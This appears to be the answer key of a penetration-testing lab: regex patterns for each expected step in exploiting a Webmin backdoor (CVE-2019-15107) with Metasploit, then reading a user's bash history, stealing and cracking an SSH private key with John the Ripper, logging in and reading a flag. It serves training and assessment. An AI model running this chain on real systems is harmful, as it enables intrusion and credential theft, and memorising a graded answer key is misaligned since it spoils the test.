nmap.* (\s\d*\.\d*\.\d*\.\d*)?|db_nmap nmap.* (\s\d*\.\d*\.\d*\.\d*)?
cat /etc/services|cat services|searchsploit webmin|nmap.*(-sV)+ (\s\d*\.\d*\.\d*\.\d*)?
msfconsole
search webmin|search cve 2019-15107
use /exploit/unix/webapp/webmin_backdoor|use exploit/unix/webapp/webmin_backdoor|use unix/webapp/webmin_backdoor|use webapp/webmin_backdoor|use webmin_backdoor
show options
set.*
check exploit_used|check rhost_set|check rport_set|check lhost_set
run.*|exploit.*
cat /root/WARNING-READ-ME.txt|cat WARNING-READ-ME.txt
ls -a /home/eve|ls -a eve.*|ls -a
cat \.bash_history|cat /home/eve/.bash_history|less \.bash_history|less /home/eve/\.bash_history|more \.bash_history|more /home/eve/\.bash_history
cat /home/eve/\.ssh/id_rsa|cat \.ssh/id_rsa|less /home/eve/\.ssh/id_rsa|less \.ssh/id_rsa
python ssh2john.py.*\s(>)?.*
john --wordlist /usr/share/wordlists/rockyou.txt.*
chmod 0600.*
ssh -i.* eve@(\d*\.\d*\.\d*\.\d*)?
cat flag.txt|cat top-secret/flag.txt